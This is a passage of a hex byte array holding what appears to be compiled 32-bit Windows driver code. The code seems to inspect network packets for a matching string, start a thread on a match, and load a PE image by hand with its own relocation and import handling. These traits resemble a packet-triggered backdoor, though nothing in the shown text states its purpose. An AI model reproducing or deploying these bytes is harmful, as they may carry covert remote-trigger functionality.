0x10,0x89,0x48,0x0d,0x8b,0x55,0xfc,0xc6,0x42,0x11,0xc3,0x8b,0x45,0xfc,0x8b,0xe5, 0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0x8b,0x45,0x14,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00, 0x74,0x54,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00, 0x8d,0x4d,0xf4,0x51,0x8d,0x55,0xf8,0x52,0x8b,0x45,0xfc,0x50,0xe8,0x3f,0xfc,0xff, 0xff,0x85,0xc0,0x75,0x27,0x83,0x3d,0xe0,0x2d,0x00,0x10,0x00,0x74,0x12,0x8b,0x4d, 0xf4,0x51,0x8b,0x55,0xf8,0x52,0x8b,0x45,0x10,0x50,0xff,0x15,0xe0,0x2d,0x00,0x10, 0x6a,0x00,0x8b,0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0xfc,0x8b, 0x02,0x89,0x45,0xfc,0xeb,0xa6,0x8b,0x4d,0x20,0x51,0x8b,0x55,0x1c,0x52,0x8b,0x45, 0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x8b,0xe5,0x5d, 0xc2,0x1c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b, 0x08,0x89,0x4d,0xf8,0x68,0x20,0x21,0x00,0x10,0x6a,0x00,0x8b,0x55,0xf8,0x52,0xe8, 0xdc,0xfe,0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x0e,0x8b,0x45,0x08, 0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xfc,0x89,0x08,0x8b,0x55,0x1c,0x52,0x8b, 0x45,0x18,0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0xff,0x55,0x0c,0x83,0x7d, 0xfc,0x00,0x74,0x1a,0x8b,0x45,0x08,0x03,0x05,0x9c,0x2d,0x00,0x10,0x8b,0x4d,0xf8, 0x89,0x08,0x6a,0x00,0x8b,0x55,0xfc,0x52,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0xe5, 0x5d,0xc2,0x18,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x8b,0x45,0x08,0xc1,0xe8,0x10,0x8b,0x4d,0x08,0x81,0xe1,0xff,0xff, 0x00,0x00,0x03,0xc1,0x89,0x45,0x08,0x8b,0x55,0x08,0xc1,0xea,0x10,0x03,0x55,0x08, 0x89,0x55,0x08,0x8b,0x45,0x08,0xf7,0xd0,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x8b,0x45,0x10,0x89,0x45,0xfc,0x83,0x7d,0x0c,0x01,0x7e,0x20, 0x8b,0x4d,0x08,0x0f,0xb7,0x11,0x03,0x55,0xfc,0x89,0x55,0xfc,0x8b,0x45,0x0c,0x83, 
0xe8,0x02,0x89,0x45,0x0c,0x8b,0x4d,0x08,0x83,0xc1,0x02,0x89,0x4d,0x08,0xeb,0xda, 0x83,0x7d,0x0c,0x00,0x7e,0x0c,0x8b,0x55,0x08,0x0f,0xb6,0x02,0x03,0x45,0xfc,0x89, 0x45,0xfc,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x6a,0x00,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x9d, 0xff,0xff,0xff,0x89,0x45,0xfc,0x8b,0x55,0xfc,0x52,0xe8,0x61,0xff,0xff,0xff,0x8b, 0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x8d,0x45,0x08,0x89,0x45,0xfc,0x8b,0x4d,0xfc,0x0f,0xb6,0x51, 0x03,0x81,0xe2,0xff,0x00,0x00,0x00,0x52,0x8b,0x45,0xfc,0x0f,0xb6,0x48,0x02,0x81, 0xe1,0xff,0x00,0x00,0x00,0x51,0x8b,0x55,0xfc,0x0f,0xb6,0x42,0x01,0x25,0xff,0x00, 0x00,0x00,0x50,0x8b,0x4d,0xfc,0x0f,0xb6,0x11,0x81,0xe2,0xff,0x00,0x00,0x00,0x52, 0x68,0xb8,0x08,0x00,0x10,0x68,0xe4,0x2d,0x00,0x10,0xe8,0x5b,0x09,0x00,0x00,0x83, 0xc4,0x18,0xb8,0xe4,0x2d,0x00,0x10,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0x3d,0x10,0x2e,0x00,0x10,0x00,0x74,0x20,0x83,0x3d,0x14,0x2e, 0x00,0x10,0x00,0x76,0x17,0xa1,0x14,0x2e,0x00,0x10,0x50,0x8b,0x0d,0x10,0x2e,0x00, 0x10,0x51,0x68,0xc8,0x08,0x00,0x10,0xe8,0x54,0xf7,0xff,0xff,0x5d,0xc2,0x04,0x00, 0x55,0x8b,0xec,0x83,0xec,0x3c,0x56,0x83,0x7d,0x10,0x22,0x73,0x05,0xe9,0x01,0x02, 0x00,0x00,0x8b,0x45,0x0c,0x89,0x45,0xec,0x8b,0x4d,0xec,0x0f,0xb7,0x51,0x0c,0x83, 0xfa,0x08,0x74,0x05,0xe9,0xea,0x01,0x00,0x00,0x8b,0x45,0xec,0x83,0xc0,0x0e,0x89, 0x45,0xe8,0x8b,0x4d,0xe8,0x8a,0x11,0xc0,0xea,0x04,0x80,0xe2,0x0f,0x0f,0xb6,0xc2, 0x83,0xf8,0x04,0x75,0x13,0x8b,0x4d,0xe8,0x8a,0x11,0x80,0xe2,0x0f,0x0f,0xb6,0xc2, 0xc1,0xe0,0x02,0x83,0xf8,0x14,0x74,0x05,0xe9,0xb6,0x01,0x00,0x00,0x8b,0x4d,0xe8, 0x0f,0xb6,0x51,0x09,0x83,0xfa,0x01,0x74,0x1c,0x8b,0x45,0xe8,0x0f,0xb6,0x48,0x09, 0x85,0xc9,0x74,0x11,0x8b,0x55,0xe8,0x0f,0xb6,0x42,0x09,0x83,0xf8,0x11,0x74,0x05, 0xe9,0x8e,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x0f,0xb7,0x51,0x02,0x81,0xe2,0xff,0x00, 
0x00,0x00,0xc1,0xe2,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0x00,0xff, 0x00,0x00,0xc1,0xf9,0x08,0x8d,0x54,0x0a,0x0e,0x3b,0x55,0x10,0x76,0x05,0xe9,0x60, 0x01,0x00,0x00,0x8b,0x45,0xe8,0x66,0x8b,0x48,0x0a,0x66,0x89,0x4d,0xd0,0x33,0xd2, 0x8b,0x45,0xe8,0x66,0x89,0x50,0x0a,0x0f,0xb7,0x75,0xd0,0x6a,0x14,0x8b,0x4d,0xe8, 0x51,0xe8,0x6a,0xfe,0xff,0xff,0x0f,0xb7,0xd0,0x3b,0xf2,0x74,0x05,0xe9,0x31,0x01, 0x00,0x00,0x8b,0x45,0xe8,0x8b,0x48,0x10,0x51,0xe8,0x82,0xfe,0xff,0xff,0x50,0x8d, 0x55,0xd8,0x52,0xe8,0x34,0x08,0x00,0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x8b,0x48, 0x0c,0x51,0xe8,0x69,0xfe,0xff,0xff,0x50,0x8d,0x55,0xf0,0x52,0xe8,0x1b,0x08,0x00, 0x00,0x83,0xc4,0x08,0x8b,0x45,0xe8,0x0f,0xb7,0x48,0x02,0x81,0xe1,0xff,0x00,0x00, 0x00,0xc1,0xe1,0x08,0x8b,0x55,0xe8,0x0f,0xb7,0x42,0x02,0x25,0x00,0xff,0x00,0x00, 0xc1,0xf8,0x08,0x03,0xc8,0x51,0x8b,0x4d,0xe8,0x0f,0xb6,0x51,0x09,0x52,0x8d,0x45, 0xd8,0x50,0x8d,0x4d,0xf0,0x51,0x68,0xe8,0x08,0x00,0x10,0xe8,0x22,0x07,0x00,0x00, 0x83,0xc4,0x14,0xc7,0x45,0xd4,0x34,0x09,0x00,0x10,0xc7,0x45,0xcc,0x00,0x00,0x00, 0x00,0xeb,0x09,0x8b,0x55,0xcc,0x83,0xc2,0x01,0x89,0x55,0xcc,0x8b,0x45,0xd4,0x50, 0xe8,0xb1,0x07,0x00,0x00,0x83,0xc4,0x04,0x8b,0x4d,0x10,0x2b,0xc8,0x39,0x4d,0xcc, 0x0f,0x83,0x8d,0x00,0x00,0x00,0x8b,0x55,0xd4,0x52,0xe8,0x97,0x07,0x00,0x00,0x83, 0xc4,0x04,0x50,0x8b,0x45,0xd4,0x50,0x8b,0x4d,0x0c,0x03,0x4d,0xcc,0x51,0xff,0x15, 0xe8,0x02,0x00,0x10,0x8b,0xf0,0x8b,0x55,0xd4,0x52,0xe8,0x77,0x07,0x00,0x00,0x83, 0xc4,0x04,0x3b,0xf0,0x75,0x58,0x68,0x48,0x09,0x00,0x10,0xe8,0xb2,0x06,0x00,0x00, 0x83,0xc4,0x04,0xc7,0x45,0xc4,0x00,0x00,0x00,0x00,0x6a,0x00,0x68,0x40,0x23,0x00, 0x10,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x45,0xc4,0x50, 0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xc8,0x83,0x7d,0xc8,0x00,0x7c,0x0c,0x8b, 0x4d,0xc4,0x51,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xc8,0x52,0x68, 0x94,0x09,0x00,0x10,0xe8,0x69,0x06,0x00,0x00,0x83,0xc4,0x08,0xeb,0x05,0xe9,0x50, 
0xff,0xff,0xff,0x5e,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x33,0xc0,0x89, 0x45,0xfc,0xc7,0x45,0xf8,0x80,0x3c,0x36,0xfe,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff, 0x8b,0x4d,0x08,0x51,0x68,0xbc,0x09,0x00,0x10,0xe8,0x24,0x06,0x00,0x00,0x83,0xc4, 0x08,0x68,0x70,0x23,0x00,0x10,0xe8,0x35,0xf7,0xff,0xff,0xe8,0xf0,0xf5,0xff,0xff, 0x8d,0x55,0xf8,0x52,0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0x83,0x7d, 0x08,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0x08,0x50,0xff,0x15,0x90,0x02,0x00,0x10, 0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0x3d,0x1c,0x2e,0x00,0x10,0x00,0x75,0x05,0x8b,0x45,0x08,0xeb, 0x0c,0x8b,0x45,0x08,0x2b,0x05,0x1c,0x2e,0x00,0x10,0x03,0x45,0x0c,0x5d,0xc2,0x08, 0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x2d, 0x12,0x00,0x00,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9, 0x54,0x01,0x00,0x00,0xa1,0x1c,0x2e,0x00,0x10,0x50,0x68,0xc0,0x0b,0x00,0x10,0xe8, 0x7e,0x05,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0xe8,0x92,0xf6,0xff,0xff,0x83,0x3d, 0x1c,0x2e,0x00,0x10,0x00,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9,0x27,0x01,0x00, 0x00,0x8b,0x0d,0x1c,0x2e,0x00,0x10,0x8b,0x15,0x1c,0x2e,0x00,0x10,0x03,0x51,0x3c, 0x89,0x55,0xf8,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xf8,0x8d,0x44,0x0a, 0x18,0x89,0x45,0xf4,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xf0, 0x83,0xc1,0x01,0x89,0x4d,0xf0,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xf0, 0x0f,0x83,0x89,0x00,0x00,0x00,0x83,0x3d,0x00,0x2e,0x00,0x10,0x00,0x75,0x0c,0x8b, 0x4d,0xf4,0x8b,0x51,0x0c,0x89,0x15,0x00,0x2e,0x00,0x10,0x8b,0x45,0xf4,0x8b,0x48, 0x24,0x81,0xe1,0x00,0x00,0x00,0x02,0x74,0x13,0x8b,0x55,0xf4,0x8b,0x42,0x24,0x25, 0xff,0xff,0xff,0xfd,0x8b,0x4d,0xf4,0x89,0x41,0x24,0xeb,0x45,0x8b,0x55,0xf8,0x8b, 
0x42,0x38,0x83,0xe8,0x01,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xf8, 0x8b,0x42,0x38,0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x8b,0x55, 0xf8,0x03,0x42,0x38,0x89,0x45,0xec,0xeb,0x09,0x8b,0x45,0xf4,0x8b,0x48,0x08,0x89, 0x4d,0xec,0x8b,0x15,0x04,0x2e,0x00,0x10,0x03,0x55,0xec,0x89,0x15,0x04,0x2e,0x00, 0x10,0x8b,0x45,0xf4,0x83,0xc0,0x28,0x89,0x45,0xf4,0xe9,0x5e,0xff,0xff,0xff,0x8b, 0x0d,0x00,0x2e,0x00,0x10,0x51,0x8b,0x15,0x04,0x2e,0x00,0x10,0x52,0x68,0xe4,0x0b, 0x00,0x10,0xe8,0x7b,0x04,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xf8,0x8b,0x0d,0x1c, 0x2e,0x00,0x10,0x89,0x48,0x34,0x8b,0x55,0xf8,0x8b,0x42,0x50,0xa3,0xfc,0x2d,0x00, 0x10,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x08,0x03,0x00,0x10,0x89,0x45,0xfc,0x83, 0x7d,0xfc,0x00,0x7d,0x11,0x8b,0x4d,0xfc,0x51,0x68,0x0c,0x0c,0x00,0x10,0xe8,0x3f, 0x04,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03, 0x48,0x3c,0x89,0x4d,0xf8,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x55,0xf8,0x0f, 0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x1d,0x8b,0x4d,0xf8,0x83,0xb9,0x80, 0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82,0x80,0x00, 0x00,0x00,0x89,0x45,0xfc,0xeb,0x3f,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa, 0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89, 0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x90,0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x45, 0xf4,0x8b,0x4d,0x08,0x03,0x88,0x90,0x00,0x00,0x00,0x89,0x4d,0xfc,0xeb,0x07,0x32, 0xc0,0xe9,0xd7,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xcb,0x00,0x00,0x00, 0x8b,0x55,0xfc,0x83,0x7a,0x0c,0x00,0x0f,0x84,0xbe,0x00,0x00,0x00,0x8b,0x45,0xfc, 0x8b,0x4d,0x08,0x03,0x48,0x0c,0x51,0x8d,0x95,0xf0,0xfe,0xff,0xff,0x52,0xe8,0xdd, 0x0a,0x00,0x00,0x8b,0x45,0x0c,0x50,0x8d,0x8d,0xf0,0xfe,0xff,0xff,0x51,0xe8,0x1d, 0x0b,0x00,0x00,0x50,0xe8,0x57,0x0a,0x00,0x00,0x85,0xc0,0x74,0x04,0xeb,0x7e,0xeb, 
0x7c,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x10,0x89,0x85,0xec,0xfe,0xff,0xff, 0x8b,0x8d,0xec,0xfe,0xff,0xff,0x83,0x39,0x00,0x74,0x62,0x8b,0x95,0xec,0xfe,0xff, 0xff,0x8b,0x45,0x08,0x03,0x02,0x89,0x85,0xe0,0xfe,0xff,0xff,0x8b,0x8d,0xe0,0xfe, 0xff,0xff,0x83,0xc1,0x02,0x89,0x8d,0xe4,0xfe,0xff,0xff,0x8b,0x95,0xe4,0xfe,0xff, 0xff,0x52,0x8b,0x45,0x10,0x50,0xe8,0x35,0x0c,0x00,0x00,0x89,0x85,0xe8,0xfe,0xff, 0xff,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x04,0x32,0xc0,0xeb,0x2f,0x8b,0x8d, 0xec,0xfe,0xff,0xff,0x8b,0x95,0xe8,0xfe,0xff,0xff,0x89,0x11,0x8b,0x85,0xec,0xfe, 0xff,0xff,0x83,0xc0,0x04,0x89,0x85,0xec,0xfe,0xff,0xff,0xeb,0x93,0x8b,0x4d,0xfc, 0x83,0xc1,0x14,0x89,0x4d,0xfc,0xe9,0x35,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d, 0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89, 0x4d,0xf8,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00, 0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x8b,0x55, 0xf8,0x0f,0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x37,0x8b,0x4d,0xf8,0x83, 0xb9,0xa0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82, 0xa0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xf8,0x8b,0x91,0xa4,0x00,0x00,0x00, 0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x34,0x33,0xd2,0x89,0x4d,0xe8,0x89,0x55, 0xec,0xeb,0x5a,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x04,0x81,0xf9,0x64,0x86,0x00,0x00, 0x75,0x44,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42,0x3c,0x89,0x45,0xe4,0x8b,0x4d, 0xe4,0x83,0xb9,0xb0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xe4,0x8b,0x45,0x08, 0x03,0x82,0xb0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xe4,0x8b,0x91,0xb4,0x00, 0x00,0x00,0x89,0x55,0xfc,0x8b,0x45,0xe4,0x8b,0x48,0x30,0x89,0x4d,0xe8,0x8b,0x50, 0x34,0x89,0x55,0xec,0xeb,0x07,0x32,0xc0,0xe9,0xff,0x00,0x00,0x00,0x83,0x7d,0xf4, 0x00,0x0f,0x84,0xf3,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0x8b,0x45, 
0xfc,0x3b,0x45,0xe0,0x0f,0x86,0xe0,0x00,0x00,0x00,0x8b,0x4d,0xf4,0x83,0x79,0x04, 0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x55,0xf4,0x8b,0x42,0x04,0x83,0xe8,0x08, 0xd1,0xe8,0x89,0x45,0xd8,0x8b,0x4d,0xf4,0x83,0xc1,0x08,0x89,0x4d,0xdc,0xc7,0x45, 0xd4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xd4,0x83,0xc2,0x01,0x89,0x55,0xd4, 0x8b,0x45,0xd4,0x3b,0x45,0xd8,0x0f,0x83,0x81,0x00,0x00,0x00,0x8b,0x4d,0xd4,0x8b, 0x55,0xdc,0x0f,0xb7,0x04,0x4a,0x85,0xc0,0x7e,0x6e,0x8b,0x4d,0xd4,0x8b,0x55,0xdc, 0x0f,0xb7,0x04,0x4a,0x25,0x00,0xf0,0x00,0x00,0xc1,0xf8,0x0c,0x66,0x89,0x45,0xd0, 0x0f,0xb7,0x4d,0xd0,0x83,0xf9,0x03,0x74,0x0d,0x0f,0xb7,0x55,0xd0,0x83,0xfa,0x0a, 0x74,0x04,0x32,0xc0,0xeb,0x66,0x8b,0x45,0xd4,0x8b,0x4d,0xdc,0x0f,0xb7,0x14,0x41, 0x81,0xe2,0xff,0x0f,0x00,0x00,0x8b,0x45,0xf4,0x8b,0x08,0x03,0xca,0x8b,0x45,0x0c, 0x99,0x2b,0x45,0xe8,0x1b,0x55,0xec,0x8b,0x55,0x08,0x03,0x04,0x0a,0x8b,0x4d,0xd4, 0x8b,0x55,0xdc,0x0f,0xb7,0x0c,0x4a,0x81,0xe1,0xff,0x0f,0x00,0x00,0x8b,0x55,0xf4, 0x03,0x0a,0x8b,0x55,0x08,0x89,0x04,0x0a,0xe9,0x6a,0xff,0xff,0xff,0x8b,0x45,0xf4, 0x8b,0x4d,0xf4,0x03,0x48,0x04,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x8b,0x45,0xe0,0x03, 0x42,0x04,0x89,0x45,0xe0,0xe9,0x14,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x10,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf8, 0x00,0x01,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xb8,0x01,0x00,0x00,0x00, 0x85,0xc0,0x0f,0x84,0x84,0x00,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15, 0xe0,0x02,0x00,0x10,0x89,0x45,0xf4,0x83,0x7d,0xf4,0x00,0x75,0x14,0x68,0x3c,0x0c, 0x00,0x10,0xe8,0x9b,0x00,0x00,0x00,0x83,0xc4,0x04,0x33,0xc0,0xe9,0x8b,0x00,0x00, 0x00,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0x8d,0x55,0xf0,0x52,0x8b,0x45,0xf8,0x50, 0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c,0x03,0x00,0x10,0x89,0x45, 0xfc,0x81,0x7d,0xfc,0x04,0x00,0x00,0xc0,0x75,0x2b,0x6a,0x00,0x8b,0x45,0xf4,0x50, 
0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0x83,0x7d,0xf0, 0x00,0x76,0x0e,0x8b,0x4d,0xf0,0x81,0xc1,0x00,0x01,0x00,0x00,0x89,0x4d,0xf8,0xeb, 0x02,0xeb,0x09,0xeb,0x02,0xeb,0x05,0xe9,0x6f,0xff,0xff,0xff,0x83,0x7d,0xfc,0x00, 0x7d,0x27,0x8b,0x55,0xfc,0x52,0x68,0x54,0x0c,0x00,0x10,0xe8,0x22,0x00,0x00,0x00, 0x83,0xc4,0x08,0x83,0x7d,0xf4,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0xf4,0x50,0xff, 0x15,0x90,0x02,0x00,0x10,0x33,0xc0,0xeb,0x03,0x8b,0x45,0xf4,0x8b,0xe5,0x5d,0xc2, 0x04,0x00,0xff,0x25,0x28,0x03,0x00,0x10,0xff,0x25,0x20,0x03,0x00,0x10,0xff,0x25, 0x1c,0x03,0x00,0x10,0xff,0x25,0xd4,0x02,0x00,0x10,0xff,0x25,0x90,0x02,0x00,0x10, 0xff,0x25,0x94,0x02,0x00,0x10,0xff,0x25,0x98,0x02,0x00,0x10,0xff,0x25,0x9c,0x02, 0x00,0x10,0xff,0x25,0xa0,0x02,0x00,0x10,0xff,0x25,0xa4,0x02,0x00,0x10,0xff,0x25, 0xa8,0x02,0x00,0x10,0xff,0x25,0xac,0x02,0x00,0x10,0xff,0x25,0xb0,0x02,0x00,0x10, 0xff,0x25,0xb4,0x02,0x00,0x10,0xff,0x25,0xb8,0x02,0x00,0x10,0xff,0x25,0xbc,0x02, 0x00,0x10,0xff,0x25,0xc0,0x02,0x00,0x10,0xff,0x25,0xc4,0x02,0x00,0x10,0xff,0x25, 0xc8,0x02,0x00,0x10,0xff,0x25,0xcc,0x02,0x00,0x10,0xff,0x25,0xd0,0x02,0x00,0x10, 0xff,0x25,0x24,0x03,0x00,0x10,0xff,0x25,0xd8,0x02,0x00,0x10,0xff,0x25,0xdc,0x02, 0x00,0x10,0xff,0x25,0xe0,0x02,0x00,0x10,0xff,0x25,0xe4,0x02,0x00,0x10,0xff,0x25, 0xe8,0x02,0x00,0x10,0xff,0x25,0xec,0x02,0x00,0x10,0xff,0x25,0xf0,0x02,0x00,0x10, 0xff,0x25,0xf4,0x02,0x00,0x10,0xff,0x25,0xf8,0x02,0x00,0x10,0xff,0x25,0xfc,0x02, 0x00,0x10,0xff,0x25,0x00,0x03,0x00,0x10,0xff,0x25,0x04,0x03,0x00,0x10,0xff,0x25, 0x08,0x03,0x00,0x10,0xff,0x25,0x0c,0x03,0x00,0x10,0xff,0x25,0x10,0x03,0x00,0x10, 0xff,0x25,0x14,0x03,0x00,0x10,0xff,0x25,0x18,0x03,0x00,0x10,0xff,0x25,0x84,0x02, 0x00,0x10,0xff,0x25,0x80,0x02,0x00,0x10,0xff,0x25,0x88,0x02,0x00,0x10,0xcc,0xcc, 0xff,0xff,0xff,0xff,0xdc,0x16,0x00,0x10,0xe2,0x16,0x00,0x10,0x00,0x00,0x00,0x00, 0xff,0xff,0xff,0xff,0x65,0x1a,0x00,0x10,0x6b,0x1a,0x00,0x10,0x00,0x00,0x00,0x00, 
0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x97,0x20,0x00,0x10,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xec,0x0a,0x00,0x10,0x00,0x0b,0x00,0x10,0x18,0x0b,0x00,0x10, 0x34,0x0b,0x00,0x10,0x50,0x0b,0x00,0x10,0x64,0x0b,0x00,0x10,0x78,0x0b,0x00,0x10, 0x40,0xbb,0x00,0x00,0xbf,0x44,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 